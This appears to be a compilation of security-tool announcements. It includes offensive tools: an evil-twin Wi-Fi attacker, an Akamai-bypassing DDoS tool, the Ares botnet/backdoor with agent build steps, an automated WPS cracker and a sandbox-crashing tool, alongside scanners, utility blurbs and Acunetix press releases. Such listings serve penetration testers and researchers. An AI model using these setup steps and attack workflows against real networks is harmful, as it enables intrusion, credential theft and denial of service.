0d1n - Tool For Automating Customized Attacks Against Web Applications


Web security tool for fuzzing HTTP inputs, written in C with libcurl.

You can do:
  • brute-force passwords in auth forms
  • directory disclosure (use a PATH list to brute-force and find HTTP status codes)
  • test a list of payloads on an input to find SQL injection and XSS vulnerabilities



To run:

Requires libcurl-dev (or libcurl-devel on rpm-based Linux).
$ git clone https://github.com/CoolerVoid/0d1n/
Install libcurl on Debian-based distros:
$ sudo apt-get install libcurl-dev
or on rpm-based distros:
$ sudo yum install libcurl-devel
$ make
$ ./0d1n

Download 0d1n

3vilTwinAttacker - Create Rogue Wi-Fi Access Point and Snooping on the Traffic


This tool creates a rogue Wi-Fi access point that purports to provide wireless Internet service while snooping on the traffic.

Software dependencies:
  • Kali Linux is recommended.
  • Ettercap.
  • Sslstrip.
  • Airbase-ng (included in aircrack-ng).
  • DHCP.
  • Nmap.

Install DHCP on Debian-based distributions

Ubuntu
$ sudo apt-get install isc-dhcp-server

Kali linux
$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

Install DHCP on Red Hat-based distributions

Fedora
$ sudo yum install dhcp

Tools Options:


Etter.dns: Edit etter.dns to load the DNS spoof module.
Dns Spoof: Start a DNS spoof attack on the fake AP interface ath0.
Ettercap: Start an Ettercap attack against hosts connected to the fake AP, capturing login credentials.
Sslstrip: sslstrip listens for traffic on port 10000.
Driftnet: Driftnet sniffs and decodes JPEG images from TCP sessions and displays them in a window.


Deauth Attack: disconnects all devices connected to the AP (wireless network); alternatively, a MAC address can be entered in the Client field so that only that one client is disconnected from the access point.
Probe Request: captures the clients trying to connect to the AP. Probe requests can be sent by anyone with a legitimate Media Access Control (MAC) address, as association to the network is not required at this stage.
MAC Changer: lets users change (spoof) their MAC address with a few clicks.
Device Fingerprint: lists the devices connected to the network with a mini fingerprint, i.e. information collected about each local computing device.


Download 3vilTwinAttacker

Acunetix clamps down on costly website security with online solution


2nd March 2015 - London, UK - As cyber security continues to hit the headlines, even smaller companies can expect to be subject to scrutiny and therefore securing their website is more important than ever. In response to this, Acunetix are offering the online edition of their vulnerability scanner at a new lower entry price. This new option allows consumers to opt for the ability to scan just one target or website and is a further step in making the top of the range scanner accessible to a wider market.

A web vulnerability scanner allows the user to identify any weaknesses in their website architecture which might aid a hacker. They are then given the full details of the problem in order to fix it. While the scanner might previously have been a niche product used by penetration testers, security experts and large corporations, in our current cyber security climate, such products need to be made available to a wider market. Acunetix have recognised this which is why both the product and its pricing have become more flexible and tailored to multiple types of user, with a one scan target option now available at $345. Pricing for other options has also been reduced by around 15% to reflect the current strength of the dollar. Use of the network scanning element of the product is also currently being offered completely free.

Acunetix CEO Nicholas Galea said: ‘Due to recent attacks such as the Sony hack and the Anthem Inc breach, companies are under increasing pressure to ensure their websites and networks are secure. We’ve been continuously developing our vulnerability scanner for a decade now, it’s a pioneer in the field and continues to be the tool of choice for many security experts. We feel it’s a tool which can benefit a far wider market which is why we developed the more flexible and affordable online version.’

About Acunetix Vulnerability Scanner (Online version)

User-friendly and competitively priced, Acunetix Vulnerability Scanner fully interprets and scans websites, including HTML5 and JavaScript and detects a large number of vulnerabilities, including SQL Injection and Cross Site Scripting, eliminating false positives. Acunetix beats competing products in many areas; including speed, the strongest support of modern technologies such as JavaScript, the lowest number of false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of reports including HIPAA and PCI compliance.

Users can sign up for a trial of the online version of Acunetix which includes the option to run free network scans.  

Acunetix Online Vulnerability Scanner


Acunetix Online Vulnerability Scanner acts as a virtual security officer for your company, scanning your websites, including integrated web applications, web servers and any additional perimeter servers, for vulnerabilities, and allowing you to fix them before hackers exploit the weak points in your IT infrastructure!

Leverages Acunetix leading web application scanner

Building on Acunetix' advanced web scanning technology, Acunetix OVS scans your website for vulnerabilities without requiring you to license, install and operate Acunetix Web Vulnerability Scanner. Acunetix OVS will deep-scan your website with its legendary crawling capability, including full HTML5 support, and its unmatched SQL injection and Cross Site Scripting finding capabilities.

Unlike other online security scanners, Acunetix is able to find a much greater number of vulnerabilities because of its intelligent analysis engine: it can even detect DOM-based Cross-Site Scripting and Blind SQL Injection vulnerabilities, and with a minimum of false positives. Remember that in the world of web scanning it's not the number of different vulnerabilities a scanner can find that matters, it's the depth with which it can check for them. Every scanner can find one or more SQL injection vulnerabilities, but few can find ALMOST ALL. Few scanners are able to find all pages and analyze all content, leaving large parts of your website unchecked. Acunetix will crawl the largest number of pages and analyze all content.

Utilizes OpenVAS for cutting edge network security scanning

And Acunetix OVS does not stop at web vulnerabilities. Recognizing the need to scan at network level and wanting to offer best-of-breed technology only, Acunetix has partnered with OpenVAS, the leading network security scanner. OpenVAS has been in development for more than 10 years and is backed by renowned security developers Greenbone. OpenVAS draws on a vulnerability database of thousands of network-level vulnerabilities. Importantly, OpenVAS vulnerability databases are always up to date, boasting an average response rate of less than 24 hours for updating and deploying vulnerability signatures to scanners.

Start your scan today

Getting Acunetix on your side is easy: sign up in minutes, install the site verification code and your scan will commence. Scanning can take several hours, depending on the number of pages and the complexity of the content. After completion, scan reports are emailed to you, and Acunetix Security Consultants are on standby to explain the results and help you action remediation. For a limited time period, 2 full Network Scans are included for FREE in the 14-day trial.


Acunetix v10 - Web Application Security Testing Tool


Acunetix, the pioneer in automated web application security software, has announced the release of version 10 of its Vulnerability Scanner. New features are designed to prevent the risk of hacking for all customers; from small businesses up to large enterprises, including WordPress users, web application developers and pen testers.

With the number of cyber-attacks drastically up in the last year and the cost of breaches doubling, never has limiting this risk been such a high priority and a cost-effective investment. The 2015 Information Security Breaches Survey from PWC found 90% of large organisations had suffered a breach and average costs have escalated to over £3m per breach, at the higher end.

The areas of a website which are most likely to be attacked and are prone to vulnerabilities are those areas that require a user to login. Therefore the latest version of Acunetix vastly improves on its ‘Login Sequence Recorder’ which can now navigate multi-step authenticated areas automatically and with ease. It crawls at lightning speed with its ‘DeepScan’ crawling engine now analyzing web applications developed using both Java Frameworks and Ruby on Rails. Version 10 also improves the automated scanning of RESTful and SOAP-based web services and can now detect over 1200 vulnerabilities in WordPress core and plugins.

Automated scanning of restricted areas

The latest automation functionality makes Acunetix not only even easier to use, but gives better peace of mind by ensuring the entire website is scanned. Restricted areas, especially user login pages, are more difficult for a scanner to access and often require manual intervention. The Acunetix "Login Sequence Recorder" overcomes this, having been significantly improved to allow restricted areas to be scanned completely automatically. This includes the ability to scan web applications that use Single Sign-On (SSO) and OAuth-based authentication. With the recorder following user actions rather than HTTP requests, it drastically improves support for anti-CSRF tokens, nonces and other one-time tokens, which are often used in restricted areas.

Top dog in WordPress vulnerability detection

With WordPress sites having exceeded 74 million in number, a single vulnerability found in the WordPress core, or even in a plugin, can be used to attack millions of individual sites. The flexibility of being able to use externally developed plugins leads to the development of even more vulnerabilities. Acunetix v10 now tests for over 1200 WordPress-specific vulnerabilities, based on the most frequently downloaded plugins, while still retaining the ability to detect vulnerabilities in custom built plugins. No other scanner on the market can detect as many WordPress vulnerabilities.

Support for various development architectures and web services

Many enterprise-grade, mission-critical applications are built using Java frameworks and Ruby on Rails. Version 10 has been engineered to accurately crawl and scan web applications built using these technologies. With the increase in HTML5 single-page applications and mobile applications, web services have become a significant attack vector. The new version improves support for SOAP-based web services with WSDL and WCF descriptions, as well as automated scanning of RESTful web services using WADL definitions. Furthermore, version 10 introduces dynamic crawl pre-seeding by integrating with external third-party tools including Fiddler, Burp Suite and the Selenium IDE to enhance business logic testing and the workflow between manual testing and automation.

Detection of Malware and Phishing URLs

Acunetix WVS 10 will ship with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs. The Malware Detection Service makes use of the Google and Yandex Safe Browsing Database.

New in Acunetix Vulnerability Scanner v10
  • 'Login Sequence Recorder' has been re-engineered from the ground-up to allow restricted areas to be scanned entirely automatically.
  • Now tests for over 1200 WordPress-specific vulnerabilities in the WordPress core and plugins.
  • Acunetix WVS Crawl data can be augmented using the output of: Fiddler .saz files, Burp Suite saved items, Burp Suite state files, HTTP Archive (.har) files, Acunetix HTTP Sniffer logs, Selenium IDE Scripts.
  • Improved support for Java Frameworks (Java Server Faces [JSF], Spring and Struts) and Ruby on Rails.
  • Increased web services support for web applications which make use of WSDL based web-services, Microsoft WCF-based web services and RESTful web services.
  • Ships with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs.

Download Acunetix Web Vulnerability Scanner Version 10

Aircrack-ng 1.2 RC 2 - WEP and WPA-PSK keys cracking program


Here is the second release candidate. Along with a LOT of fixes, it improves support for the Airodump-ng scan visualizer. Airmon-zc is mature and is now renamed to Airmon-ng. Also, Airtun-ng is now able to encrypt and decrypt WPA on top of WEP. Another big change is that recent versions of GPSd now work very well with Airodump-ng.

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.

 Aircrack-ng is the next generation of aircrack with lots of new features:

Download Aircrack-ng 1.2 RC 2

Aircrack-ng 1.2 RC 3 - WEP and WPA-PSK Keys Cracking Program


Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

This is the third release candidate, and hopefully it will be the last one. It contains a ton of bug fixes, code cleanup, improvements and compilation fixes everywhere. Some features were added: AppArmor profiles and better FreeBSD support, including an airmon-ng for FreeBSD.

Aircrack-ng Changelog

Version 1.2-rc3 (changes from aircrack-ng 1.2-rc2) - Released 21 Nov 2015:
  • Airodump-ng: Prevent sending signal to init which caused the system to reboot/shutdown.
  • Airbase-ng: Allow to use a user-specified ANonce instead of a randomized one when doing the 4-way handshake
  • Aircrack-ng: Fixed compilation warnings.
  • Aircrack-ng: Removed redundant NULL check and fixed typo in another one.
  • Aircrack-ng: Workaround for segfault when compiling aircrack-ng with clang and gcrypt and running a check.
  • Airmon-ng: Created version for FreeBSD.
  • Airmon-ng: Prevent passing invalid values as channel.
  • Airmon-ng: Handle udev renaming interfaces.
  • Airmon-ng: Better handling of rfkill.
  • Airmon-ng: Updated OUI URL.
  • Airmon-ng: Fix VM detection.
  • Airmon-ng: Make lsusb optional if there doesn't seem to be a usb bus. Improve pci detection slightly.
  • Airmon-ng: Various cleanup and fixes (including wording and typos).
  • Airmon-ng: Display iw errors.
  • Airmon-ng: Improved handling of non-monitor interfaces.
  • Airmon-ng: Fixed error when running 'check kill'.
  • Airdrop-ng: Display error instead of stack trace.
  • Airmon-ng: Fixed bashism.
  • Airdecap-ng: Allow specifying output file names.
  • Airtun-ng: Added missing parameter to help screen.
  • Besside-ng-crawler: Removed reference to darkircop.org (non-existent subdomain).
  • Airgraph-ng: Display error when no graph type is specified.
  • Airgraph-ng: Fixed make install.
  • Manpages: Fixed, updated and improved airodump-ng, airmon-ng, aircrack-ng, airbase-ng and aireplay-ng manpages.
  • Aircrack-ng GUI: Fixes issues with wordlists selection.
  • OSdep: Add missing RADIOTAP_SUPPORT_OVERRIDES check.
  • OSdep: Fix possible infinite loop.
  • OSdep: Use a default MTU of 1500 (Linux only).
  • OSdep: Fixed compilation on OSX.
  • AppArmor: Improved and added profiles.
  • General: Fixed warnings reported by clang.
  • General: Updated TravisCI configuration file.
  • General: Fixed typos in various tools.
  • General: Fixed clang warning about 'gcry_thread_cbs()' being deprecated with gcrypt > 1.6.0.
  • General: Fixed compilation on cygwin due to undefined reference to GUID_DEVCLASS_NET.
  • General: Fixed compilation with musl libc.
  • General: Improved testing and added test cases (make check).
  • General: Improved mutexes handling in various tools.
  • General: Fixed memory leaks, use after free, null termination and return values in various tools and OSdep.
  • General: Fixed compilation on FreeBSD.
  • General: Various fixes and improvements to README (wording, compilation, etc).
  • General: Updated copyrights in help screen.


AntiCuckoo - A Tool to Detect and Crash Cuckoo Sandbox


A tool to detect and crash Cuckoo Sandbox. Tested on the official Cuckoo Sandbox and on Accuvant's Cuckoo version.

Features
  • Detection:
    • Cuckoo hook detection (all kinds of Cuckoo hooks).
    • Suspicious data in the program's own memory (without APIs, scanning page by page).
  • Crash (execute with arguments; outside a sandbox these arguments don't crash the program):
    • -c1: Modifies the RET N instruction of a hooked API to a higher value, so the next call to that API pushes more arguments onto the stack. If the hooked API is called from Cuckoo's HookHandler, the program crashes because the HookHandler only pushes the real API arguments, and the modified RET N instruction then corrupts the HookHandler's stack.
The overkill methods can be useful. For example, using the overkill methods you get two features in one: detection/crash and "a kind of Sleep" (Cuckoomon bypasses long Sleep calls).

Cuckoo Detection

Submit Release/anticuckoo.exe for analysis in Cuckoo Sandbox. Check the screenshots (console output). You can also check Accessed Files in the Summary:


Accessed Files in Summary (Django web interface):

Cuckoo Crash

Specify the crash argument in the submit options, e.g. -c1 (via the Django web interface):

Then check the screenshots, or connect via RDP or any other connection, to verify the crash. E.g. -c1 via RDP:



Download AntiCuckoo

AppCrashView - View Application Crashes (.wer files)


AppCrashView is a small utility for Windows Vista and Windows 7 that displays the details of all application crashes that occurred on your system. The crash information is extracted from the .wer files created by the Windows Error Reporting (WER) component of the operating system every time a crash occurs. AppCrashView also allows you to easily save the crash list to a text/csv/html/xml file.

System Requirements

For now, this utility only works on Windows Vista, Windows 7, and Windows Server 2008, simply because earlier versions of Windows don't save the crash information into .wer files. It's possible that in future versions, I'll also add support for Windows XP/2000/2003 by using Dr. Watson (Drwtsn32.exe) or other debug components that capture the crash information.

Using AppCrashView

AppCrashView doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file, AppCrashView.exe. The main window of AppCrashView contains two panes. The upper pane displays the list of all crashes found on your system, while the lower pane displays the content of the crash file that you select in the upper pane.

You can select one or more crashes in the upper pane, and then save them (Ctrl+S) into a text/html/xml/csv file or copy them to the clipboard, and paste them into Excel or another spreadsheet application.

Command-Line Options
/ProfilesFolder <Folder> Specifies the user profiles folder (e.g: c:\users) to load. If this parameter is not specified, the profiles folder of the current operating system is used.
/ReportsFolder <Folder> Specifies the folder that contains the WER files you wish to load.
/ShowReportQueue <0 | 1> Specifies whether to enable the 'Show ReportQueue Files' option. 1 = enable, 0 = disable
/ShowReportArchive <0 | 1> Specifies whether to enable the 'Show ReportArchive Files' option. 1 = enable, 0 = disable
/stext <Filename> Save the list of application crashes into a regular text file.
/stab <Filename> Save the list of application crashes into a tab-delimited text file.
/scomma <Filename> Save the list of application crashes into a comma-delimited text file (csv).
/stabular <Filename> Save the list of application crashes into a tabular text file.
/shtml <Filename> Save the list of application crashes into HTML file (Horizontal).
/sverhtml <Filename> Save the list of application crashes into HTML file (Vertical).
/sxml <Filename> Save the list of application crashes into XML file.
/sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Event Name" and "Process File". You can specify the '~' prefix character (e.g: "~Event Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort 2 /sort ~1
AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort "Process File"
/nosort When you specify this command-line option, the list will be saved without any sorting.


Download AppCrashView

Appie - Android Pentesting Portable Integrated Environment


Appie is a software package that has been pre-configured to function as an Android pentesting environment. It is completely portable and can be carried on a USB stick. This is a one-stop answer for all the tools needed in an Android application security assessment.

Difference between Appie and existing environments?
  • Tools contained in Appie run on the host machine instead of in a virtual machine.
  • Less space needed (only 600MB compared to at least 8GB for a virtual machine).
  • As the name suggests it is completely portable, i.e. it can be carried on a USB stick or on your own smartphone, and your pentesting environment will go wherever you go without any differences.
  • Awesome interface.

Which tools are included in Appie ?

Download Appie

AppUse - Android Pentest Platform Unified Standalone Environment

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the android environment, and it includes unique custom-made tools.

Faster & More Powerful

The system is a blessing to security teams, who from now on can easily perform security tests on Android applications. It was created as a virtual machine targeted for penetration testing teams who are interested in a convenient, personalized platform for android application security testing, for catching security problems and analysis of the application traffic.

Now, in order to test Android applications, all you will need is to download AppUse Virtual Machine, activate it, load your application and test it.


Easy to Use

There is no need for installation of simulators and testing tools, no need for SSL certificates of the proxy software, everything comes straight out of the box pre-installed and configured for an ideal user experience.

Security experts who have seen the machine were very excited, calling it the next ‘BackTrack’ (a famous system for testing security problems), specifically adjusted for Android application security testing.

AppUse VM closes gaps in the world of security, now there is a special and customized testing environment for Android applications; an environment like this has not been available until today, certainly not with the rich format offered today by AppUse VM.

This machine is intended for the daily use of security testers everywhere for Android applications, and is a must-have tool for any security person.

We at AppSec Labs do not stagnate, specifically at a time in which so many cyber attacks take place, we consider it our duty to assist the public and enable quick and effective security testing.

As a part of AppSec Labs’ policy to promote application security in general, and specifically mobile application security, AppUse is offered as a free download on our website, in order to share the knowledge, experience and investment with the data security community.

Features
  • New Application Data Section
  • Tree-view of the application's folder/file structure
  • Ability to pull files
  • Ability to view files
  • Ability to edit files
  • Ability to extract databases
  • Dynamic proxy managed via the Dashboard
  • New application-reversing features
  • Updated ReFrameworker tool
  • Dynamic indicator for Android device status
  • Bugs and functionality fixes

Download AppUse

ARDT - Akamai Reflective DDoS Tool


Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Based off the research done at NCC: ( https://dl.packetstormsecurity.net/papers/attack/the_pentesters_guide_to_akamai.pdf )
Akamai boasts around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc., to ensure that a minimal number of requests actually hit the origin web server being protected. However, the issue with caching is that you cannot cache something that is non-deterministic, i.e. a search result. A search that has not been requested before is likely not in the cache, and will result in a cache miss and the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache-missing request, produce multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with a 100,000 Akamai edge node list, and a request which results in 10KB hitting the origin, if my calculations are correct, that's around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:
# python ARDT_Akamai_EdgeNode_Finder.py
This can be edited quite easily to find more; it then saves the IPs automatically.


Download ARDT

Ares - Python Botnet and Backdoor



Ares is made of two main programs:
  • A Command aNd Control server, which is a Web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the CNC
The Web interface can be run on any server running Python. You need to install the cherrypy package.
The client is a Python program meant to be compiled as a win32 executable using pyinstaller. It depends on the requests, pythoncom and pyhook Python modules and on PIL (Python Imaging Library).

It currently supports:
  • remote cmd.exe shell
  • persistence
  • file upload/download
  • screenshot
  • key logging

Installation

Server

To install the server, first create the sqlite database:
cd server/
python db_init.py
If not already installed, install the cherrypy Python package.
Then launch the server by issuing: python server.py
By default, the server listens on http://localhost:8080

Agent

The agent can be launched as a python script, but it is ultimately meant to be compiled as a win32 executable using pyinstaller.

First, install all the dependencies:
  • requests
  • pythoncom
  • pyhook
  • PIL
Then, configure agent/settings.py according to your needs:
SERVER_URL = URL of the CNC HTTP server
BOT_ID = the (unique) name of the bot; leave empty to use the hostname
DEBUG = should debug messages be printed to stdout?
IDLE_TIME = time of inactivity before going into idle mode (the agent checks the CNC for commands far less often when idle)
REQUEST_INTERVAL = interval between each query to the CNC when active
Finally, use pyinstaller to compile the agent into a single exe file:
cd client/
pyinstaller --onefile --noconsole agent.py


Download Ares

AsHttp - Shell Command to Expose any other Command as HTTP


ashttp provides a simple way to expose any shell command over HTTP. For example, to expose top over HTTP, try: ashttp -p8080 top ; then open http://localhost:8080.

Dependencies

ashttp depends on hl_vt100, a headless VT100 emulator.
To get and compile hl_vt100:
$ git clone https://github.com/JulienPalard/vt100-emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install

Usage

ashttp can serve any text application over HTTP, for example:
$ ashttp -p 8080 top
to serve top on port 8080, or
$ ashttp -p 8080 watch -n 1 ls -lah /tmp
to serve a continuously refreshed directory listing of /tmp


Download AsHttp

ATSCAN - Server, Site and Dork Scanner



Description:

  • ATSCAN Version 2
  • Dork scanner.
  • XSS scanner.
  • Sqlmap.
  • LFI scanner.
  • Filter WordPress and Joomla sites on the server.
  • Find admin page.
  • Decode / Encode MD5 + Base64.

Libraries to install:

apt-get install libxml-simple-perl
NOTE: Works on Linux platforms.

Permissions & Execution:

$ chmod +x atscan.pl
$ perl ./atscan.pl

Download ATSCAN

AutoBrowser - Create Report and Screenshots of HTTP/s Based Ports on the Network

AutoBrowser is a tool written in Python for penetration testers. The purpose of this tool is to create a report and screenshots of HTTP/S-based ports on the network. It analyzes an Nmap report (or scans with Nmap), checks the results with an HTTP/S request to each host using a headless web browser, and grabs a screenshot of the response page content.
  • This tool is designed for IT professionals performing penetration tests to scan and analyze Nmap results.

Proof of concept video (From version: 2.0)

Examples

Values in CLI arguments must be delimited by double quotes only!
  • Get the argument details of the scan method: python AutoBrowser.py scan --help
  • Scan with Nmap, check the results and create a folder named project_name: python AutoBrowser.py scan "192.168.1.1/24" -a="-sT -sV -T3" -p project_name
  • Get the argument details of the analyze method: python AutoBrowser.py analyze --help
  • Analyze an Nmap XML report and create a folder named report_analyze: python AutoBrowser.py analyze nmap_file.xml --project report_analyze

Requirements:

Linux Installation:
  1. sudo apt-get install python-pip python2.7-dev libxext-dev python-qt4 qt4-dev-tools build-essential nmap
  2. sudo pip install -r requirements.txt

MacOSx Installation:
  1. Install Xcode Command Line Tools (AppStore)
  2. ruby -e "$(curl -fsSL https://raw.github.com/mxcl/homebrew/go)"
  3. brew install pyqt nmap
  4. sudo easy_install pip
  5. sudo pip install -r requirements.txt

Windows Installation:
  1. Install setuptools
  2. Install pip
  3. Install PyQt4
  4. install Nmap
  5. Open Command Prompt(cmd) as Administrator -> Goto python folder -> Scripts (cd c:\Python27\Scripts)
  6. pip install -r (Full Path To requirements.txt)


Download AutoBrowser

AutoReaver - Multiple Access Point Targets Attack Using Reaver

AutoReaver is a bash script which provides multiple access point attacks using reaver and a BSSID list from a text file.

If the AP being processed reaches its rate limit, the script moves on to the next one from the list, and so forth.

HOW IT WORKS?
The script takes the AP target list from a text file in the following format:
BSSID CHANNEL ESSID
For example:
AA:BB:CC:DD:EE:FF 1 MyWlan
00:BB:CC:DD:EE:FF 13 TpLink
00:22:33:DD:EE:FF 13 MyHomeSSID
Then the following steps are processed:
  • Every line of the list file is checked separately in a for loop.
  • After going through every AP on the list once, the script automatically changes the MAC address of your card to a random MAC using macchanger (you can also set up your own MAC if you need).
  • The whole list is checked again and again in an endless while loop; the loop is stopped when there is nothing left to check.
  • Found PINs/WPA passphrases are stored in the {CRACKED_LIST_FILE_PATH} file.

REQUIREMENTS
  • Wireless adapter which supports injection (see the Reaver Wiki: https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers)
  • Linux Backtrack 5
  • Root access on your system (otherwise some things may not work)
  • AND if you use another Linux distribution:
    • Reaver 1.4 (I didn't try it with previous versions)
    • KDE (unless you'll change 'konsole' invocations to 'screen', 'gnome-terminal' or something like that... this is easy)
    • Gawk (Gnu AWK)
    • Macchanger
    • Airmon-ng, Airodump-ng, Aireplay-ng
    • Wash (WPS Service Scanner)
    • Perl

USAGE EXAMPLE
First you have to download the latest version
git clone https://code.google.com/p/auto-reaver/
Go to auto-reaver directory
cd ./auto-reaver
Make sure that the scripts have execute (x) permissions for your user; if not, run
chmod 700 ./washAutoReaver
chmod 700 ./autoReaver
Run the wash scanner to make a formatted list of access points with the WPS service enabled:
./washAutoReaverList > myAPTargets
Wait 1-2 minutes for wash to collect APs, then hit CTRL+C to kill the script. Check whether any APs were detected:
cat ./myAPTargets
If there are targets in the myAPTargets file, you can proceed with the attack using the following command:
./autoReaver myAPTargets

ADDITIONAL FEATURES
  • The script logs the dates of PIN attempts, so you can check how often an AP is locked and for how long. The default directory for those logs is ReaverLastPinDates.
  • The script logs the rate limit of every AP (default directory is /tmp/APLimitBSSID), so you can easily check when the last rate limit occurred
  • You can set up your attack using variables from the configurationSettings file (sleep/wait times between APs and loops, etc.)
  • You can disable checking an AP by adding a "#" sign at the beginning of its line in the myAPTargets file (the AP will then be omitted in the loop)
  • (added 2014-07-03) You can set up specific settings per access point.
    To do that for the AP with MAC AA:BB:CC:DD:EE:FF, just create the file ./configurationSettingsPerAp/AABBCCDDEEFF
    and put there the variables from the ./configurationSettings file that you want to change, for example:
    ADDITIONAL_OPTIONS="-g 10 -E -S -N -T 1 -t 15 -d 0 -x 3";
    so AA:BB:CC:DD:EE:FF will have only ADDITIONAL_OPTIONS changed (the rest of the variables from the ./configurationSettings file remain unchanged).
You can define the channel as random by setting its value (in the myAPTargets file) to R; this forces the script to find the AP channel automatically.
Example:
AA:BB:CC:DD:EE:FF R MyWlan

But remember that you should probably also increase the value of the BSSID_ONLINE_TIMEOUT variable, since hopping between all channels takes much more time than searching on one channel.


Download AutoReaver

Autorize - Automatic Authorization Enforcement Detection (Extension for Burp Suite)


Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert at AppSec Labs. Autorize was designed to help security testers by performing automatic authorization tests.

Installation
  1. Download Burp Suite (obviously): http://portswigger.net/burp/download.html
  2. Download Jython standalone JAR: http://www.jython.org/downloads.html
  3. Open burp -> Extender -> Options -> Python Environment -> Select File -> Choose the Jython standalone JAR
  4. Install Autorize from the BApp Store or follow these steps:
  5. Download the Autorize.py file.
  6. Open Burp -> Extender -> Extensions -> Add -> Choose Autorize.py file.
  7. See the Autorize tab and enjoy automatic authorization detection :)

User Guide - How to use?
  1. After installation, the Autorize tab will be added to Burp.
  2. Open the configuration tab (Autorize -> Configuration).
  3. Get your low-privileged user authorization token header (Cookie / Authorization) and copy it into the textbox containing the text "Insert injected header here".
  4. Click on "Intercept is off" to start intercepting the traffic in order to allow Autorize to check for authorization enforcement.
  5. Open a browser and configure the proxy settings so the traffic will be passed to Burp.
  6. Browse to the application you want to test with a high privileged user.
  7. The Autorize table will show you the request's URL and enforcement status.
  8. It is possible to click on a specific URL and see the original/modified request/response in order to investigate the differences.

Authorization Enforcement Status

There are 3 enforcement statuses:
  1. Authorization bypass! - Red color
  2. Authorization enforced! - Green color
  3. Authorization enforced??? (please configure enforcement detector) - Yellow color
The first 2 statuses are clear, so I won’t elaborate on them.
The 3rd status means that Autorize cannot determine if authorization is enforced or not, and so Autorize will ask you to configure a filter in the enforcement detector tab.
The enforcement detector filters will allow Autorize to detect authorization enforcement by fingerprint (string in the message body) or content-length in the server's response.

For example, if a request's enforcement status is reported as "Authorization enforced??? (please configure enforcement detector)", you can inspect the modified/original responses and may see that the modified response body contains the string "You are not authorized to perform action". Adding a filter with the fingerprint value "You are not authorized to perform action" makes Autorize look for that fingerprint and automatically detect that authorization is enforced. The same can be done by defining a content-length filter.
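The three statuses and the two filter kinds described above, as an added example modelled on this guide (not Autorize's own code): it compares the high-privileged user's response with the one obtained after injecting the low-privileged user's header, and assigns a status. The Response and EnforcementDetector classes, the decision order and all sample responses are assumptions constructed for the example.

```python
from dataclasses import dataclass, field

# Status strings as the guide lists them (red / green / yellow in the Autorize table).
BYPASS = "Authorization bypass!"
ENFORCED = "Authorization enforced!"
UNKNOWN = "Authorization enforced??? (please configure enforcement detector)"


@dataclass
class Response:
    """Minimal HTTP response model (constructed for this example)."""
    status: int
    body: str

    @property
    def content_length(self) -> int:
        return len(self.body.encode("utf-8"))


@dataclass
class EnforcementDetector:
    """The two filter kinds the guide describes: body fingerprints and content lengths."""
    fingerprints: list = field(default_factory=list)
    content_lengths: set = field(default_factory=set)

    def matches(self, resp: Response) -> bool:
        # A match means the server answered with its 'not authorized' response.
        if any(fp in resp.body for fp in self.fingerprints):
            return True
        return resp.content_length in self.content_lengths


def classify(original: Response, modified: Response,
             detector: EnforcementDetector) -> str:
    """Decide the enforcement status for one request.

    original: response to the high-privileged user's own request.
    modified: response to the same request replayed with the low-privileged
              user's Cookie/Authorization header injected.
    Decision order (an assumption modelled on the guide's description):
      1. a detector filter matches the modified response -> enforced
      2. the modified response is identical to the original -> bypass
      3. otherwise the tool cannot tell -> ask for a filter
    """
    if detector.matches(modified):
        return ENFORCED
    if (modified.status == original.status
            and modified.content_length == original.content_length
            and modified.body == original.body):
        return BYPASS
    return UNKNOWN


def demo() -> dict:
    """Constructed cases covering each status, before and after configuring a filter."""
    admin_page = Response(200, '{"user":"admin","role":"superuser","balance":1000}')
    denied = Response(403, '{"error":"You are not authorized to perform action"}')
    empty_redirect = Response(302, "")
    no_filters = EnforcementDetector()
    fingerprint_filter = EnforcementDetector(
        fingerprints=["You are not authorized to perform action"])
    length_filter = EnforcementDetector(content_lengths={0})
    return {
        # Same page served to the low-privileged user: missing authorization check.
        "bypass": classify(admin_page, admin_page, no_filters),
        # Different answer, but no filter yet: Autorize asks for one (yellow).
        "unknown_before_filter": classify(admin_page, denied, no_filters),
        # With the fingerprint configured the same case is recognised as enforced.
        "enforced_after_filter": classify(admin_page, denied, fingerprint_filter),
        # A content-length filter works the same way for a bodiless redirect.
        "enforced_by_length": classify(admin_page, empty_redirect, length_filter),
    }
```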


AVCaesar - Malware Analysis Engine and Repository


AVCaesar is a malware analysis engine and repository, developed by malware.lu within the FP7 project CockpitCI.

Functionalities

AVCaesar can be used to:
  • Perform an efficient malware analysis of suspicious files based on the results of a set of antivirus solutions, bundled together to reach the highest possible probability of detecting potential malware;
